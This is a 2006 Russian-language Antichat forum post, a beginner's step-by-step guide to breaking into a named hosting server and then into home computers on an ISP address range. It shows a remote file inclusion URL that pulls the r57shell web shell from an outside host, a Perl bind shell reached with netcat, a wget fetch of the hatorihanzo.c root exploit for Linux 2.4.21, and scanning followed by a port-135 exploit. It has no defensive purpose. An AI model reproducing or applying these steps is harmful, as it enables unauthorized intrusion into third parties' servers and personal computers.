ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Взлом сервера, и проникновение на удалённый компьютер
  #1  
Старый 05.03.2006, 15:00
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
Post Взлом сервера, и проникновение на удалённый компьютер

Сразу оговорюсь эта статья исключительно для новичков, и для тех кто с этим никогда раньше не сталкивался!

Всё скрипты и программы искользуемые в статье качаем отсюда:
http://d1m0n.jino-net.ru/root.rar

В этой статье я расскажу как можно получить рута на сервере с уязвимым ядром Linux 2.4.21, а так же как через этот сервер можно проникнуть на удалённый компьютер через 135 порт. Итак начнём.

Действие первое:

Получаем рута на сервере.
Я нашёл хостинг _http://i2dhost.com с распространённой уязвимостью. Воспользуемся этой уязвимостью:
Код:
i2dhost.com/hostadmin/?path=http://rst.void.ru/download/r57shell.txt?
Тээкс мы зашли в шелл. Изменим рабочую дерикторию на /tmp. Сделали ? Идём далее. Теперь нам надо открыть порт чтобы законектиться к серверу через прогу netcat. Воспользуемя бинд шеллом который откроет нам 32762 порт. Заливаем бинд шелл со своего компьютера (это легко делается при помощи r57shell). Так бинд шелл залили, теперь надо его запустить командой:
Код:
perl bind_port.pl
Сделали. Теперь запускаем программу netcat и вписываем туда i2dhost.com 32762. Набираем ls -la, и вот перед нами список файлов в директории /tmp. Следующим шагом будет заливка и компиляция скрипта который и даст нам рута.
В netcat набираем
Код:
wget http://packetstormsecurity.org/0312-exploits/hatorihanzo.c
Ждём пару секунд. Всё загрузилось? Теперь компилируем командой:
Код:
gcc -o hatorihanzo hatorihanzo.c -static
Скомпилировали. Теперь запускаем командой
Код:
./hatorihanzo
Теперь набираем команду id и видим
Код:
uid=0|root|  gid=0|root|
Все теперь на сервере у нас права root.

Действие второе:

Проникаем на удалённый компьютер.
Сначала ище компьютеры с открытым 135 портом. Я это делал при помощи XSpider'a. Вбиваем диапазон ip адресов своего прова у меня это 82.179.80.1 - 82.179.82.255. Запускаем сканер. И он ищет все компы, и показывает их открытые порты. У меня он из 40 компов нашёл 17 с открытым 135 портом. Далее заливаем скрипт expl.c на порутаный нами сервак. Компилируем его командой
Код:
gcc -o expl expl.c
Теперь запускаем командой:
Код:
./expl
Ну а там уже разобраться не трудно)
Так же оговорюсь что для выполнения второго действия права root не обязательны.
Ну вот и всё. Спасибо за внимание.

Последний раз редактировалось D1mOn; 05.03.2006 в 15:04..
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проникновение Dimann Болталка 5 12.05.2005 12:10
Взлом сервера Microsoft IIS 6 Через SQL Запросы [Tsh] *CorPSe* АнтиАдмин 3 08.03.2005 12:16



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ